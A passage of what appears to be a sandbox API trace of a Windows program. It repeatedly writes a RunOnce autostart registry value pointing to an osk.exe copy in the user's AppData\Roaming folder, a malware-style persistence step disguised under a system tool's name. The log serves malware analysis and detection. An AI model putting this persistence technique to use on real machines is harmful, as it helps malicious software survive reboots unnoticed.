uIDEvent=0x233a) returned 1 [0099.909] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.909] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.909] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.910] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.910] RegCloseKey (hKey=0x280) returned 0x0 [0099.910] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.910] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.910] SetTimer (hWnd=0x20280, nIDEvent=0x233b, uElapse=0xa, lpTimerFunc=0x0) returned 0x233b [0099.910] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.923] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.923] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.924] KillTimer (hWnd=0x20280, uIDEvent=0x233b) returned 1 [0099.924] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.924] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.924] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.925] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.925] RegCloseKey (hKey=0x280) returned 0x0 [0099.925] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.925] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.925] SetTimer (hWnd=0x20280, nIDEvent=0x233c, uElapse=0xa, lpTimerFunc=0x0) returned 0x233c [0099.925] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.939] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.939] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.939] KillTimer (hWnd=0x20280, uIDEvent=0x233c) returned 1 [0099.939] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.940] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.940] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.940] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.940] RegCloseKey (hKey=0x280) returned 0x0 [0099.940] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.940] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.941] SetTimer (hWnd=0x20280, nIDEvent=0x233d, uElapse=0xa, lpTimerFunc=0x0) returned 0x233d [0099.941] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.955] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.955] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.955] KillTimer (hWnd=0x20280, uIDEvent=0x233d) returned 1 [0099.955] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.955] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.956] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.956] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.956] RegCloseKey (hKey=0x280) returned 0x0 [0099.956] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.956] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.956] SetTimer (hWnd=0x20280, nIDEvent=0x233e, uElapse=0xa, lpTimerFunc=0x0) returned 0x233e [0099.956] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.980] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.980] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.980] KillTimer (hWnd=0x20280, uIDEvent=0x233e) returned 1 [0099.980] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.981] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.981] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.981] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.981] RegCloseKey (hKey=0x280) returned 0x0 [0099.981] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.981] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.981] SetTimer (hWnd=0x20280, nIDEvent=0x233f, uElapse=0xa, lpTimerFunc=0x0) returned 0x233f [0099.981] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.986] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.986] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.986] KillTimer (hWnd=0x20280, uIDEvent=0x233f) returned 1 [0099.986] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.987] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.987] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.987] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.987] RegCloseKey (hKey=0x280) returned 0x0 [0099.987] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.987] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.987] SetTimer (hWnd=0x20280, nIDEvent=0x2340, uElapse=0xa, lpTimerFunc=0x0) returned 0x2340 [0099.987] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.002] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.002] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.002] KillTimer (hWnd=0x20280, uIDEvent=0x2340) returned 1 [0100.002] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.002] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.003] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.003] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.003] RegCloseKey (hKey=0x280) returned 0x0 [0100.003] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.003] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.003] SetTimer (hWnd=0x20280, nIDEvent=0x2341, uElapse=0xa, lpTimerFunc=0x0) returned 0x2341 [0100.003] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.019] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.019] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.019] KillTimer (hWnd=0x20280, uIDEvent=0x2341) returned 1 [0100.019] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.019] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.020] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.020] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.020] RegCloseKey (hKey=0x280) returned 0x0 [0100.020] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.020] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.020] SetTimer (hWnd=0x20280, nIDEvent=0x2342, uElapse=0xa, lpTimerFunc=0x0) returned 0x2342 [0100.020] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.033] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.033] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.033] KillTimer (hWnd=0x20280, uIDEvent=0x2342) returned 1 [0100.033] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.033] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.034] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.034] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.034] RegCloseKey (hKey=0x280) returned 0x0 [0100.034] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.034] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.034] SetTimer (hWnd=0x20280, nIDEvent=0x2343, uElapse=0xa, lpTimerFunc=0x0) returned 0x2343 [0100.034] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.048] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.048] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.048] KillTimer (hWnd=0x20280, uIDEvent=0x2343) returned 1 [0100.049] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.049] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.049] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.049] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.050] RegCloseKey (hKey=0x280) returned 0x0 [0100.050] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.050] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.050] SetTimer (hWnd=0x20280, nIDEvent=0x2344, uElapse=0xa, lpTimerFunc=0x0) returned 0x2344 [0100.050] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.064] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.064] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.064] KillTimer (hWnd=0x20280, uIDEvent=0x2344) returned 1 [0100.064] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.065] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.065] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.065] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.065] RegCloseKey (hKey=0x280) returned 0x0 [0100.065] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.065] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.066] SetTimer (hWnd=0x20280, nIDEvent=0x2345, uElapse=0xa, lpTimerFunc=0x0) returned 0x2345 [0100.066] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.107] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.107] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.108] KillTimer (hWnd=0x20280, uIDEvent=0x2345) returned 1 [0100.109] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.115] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.115] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.115] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.116] RegCloseKey (hKey=0x280) returned 0x0 [0100.116] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.116] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.116] SetTimer (hWnd=0x20280, nIDEvent=0x2346, uElapse=0xa, lpTimerFunc=0x0) returned 0x2346 [0100.116] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.127] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.127] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.127] KillTimer (hWnd=0x20280, uIDEvent=0x2346) returned 1 [0100.127] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.127] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.128] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.128] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.128] RegCloseKey (hKey=0x280) returned 0x0 [0100.128] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.128] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.128] SetTimer (hWnd=0x20280, nIDEvent=0x2347, uElapse=0xa, lpTimerFunc=0x0) returned 0x2347 [0100.128] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.145] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.145] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.145] KillTimer (hWnd=0x20280, uIDEvent=0x2347) returned 1 [0100.146] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.146] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.146] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.146] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.146] RegCloseKey (hKey=0x280) returned 0x0 [0100.147] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.147] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.147] SetTimer (hWnd=0x20280, nIDEvent=0x2348, uElapse=0xa, lpTimerFunc=0x0) returned 0x2348 [0100.147] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.157] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.157] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.158] KillTimer (hWnd=0x20280, uIDEvent=0x2348) returned 1 [0100.158] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.158] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.158] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.159] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.159] RegCloseKey (hKey=0x280) returned 0x0 [0100.159] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.159] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.159] SetTimer (hWnd=0x20280, nIDEvent=0x2349, uElapse=0xa, lpTimerFunc=0x0) returned 0x2349 [0100.159] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.173] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.173] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.174] KillTimer (hWnd=0x20280, uIDEvent=0x2349) returned 1 [0100.174] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.174] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.174] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.175] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.175] RegCloseKey (hKey=0x280) returned 0x0 [0100.175] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.175] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.175] SetTimer (hWnd=0x20280, nIDEvent=0x234a, uElapse=0xa, lpTimerFunc=0x0) returned 0x234a [0100.175] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.189] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.189] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.189] KillTimer (hWnd=0x20280, uIDEvent=0x234a) returned 1 [0100.189] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.190] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.190] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.190] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.190] RegCloseKey (hKey=0x280) returned 0x0 [0100.190] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.190] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.190] SetTimer (hWnd=0x20280, nIDEvent=0x234b, uElapse=0xa, lpTimerFunc=0x0) returned 0x234b [0100.190] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.204] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.204] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.204] KillTimer (hWnd=0x20280, uIDEvent=0x234b) returned 1 [0100.205] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.205] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.205] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.205] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.206] RegCloseKey (hKey=0x280) returned 0x0 [0100.206] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.206] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.206] SetTimer (hWnd=0x20280, nIDEvent=0x234c, uElapse=0xa, lpTimerFunc=0x0) returned 0x234c [0100.206] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.220] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.220] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.221] KillTimer (hWnd=0x20280, uIDEvent=0x234c) returned 1 [0100.221] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.221] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.221] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.221] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 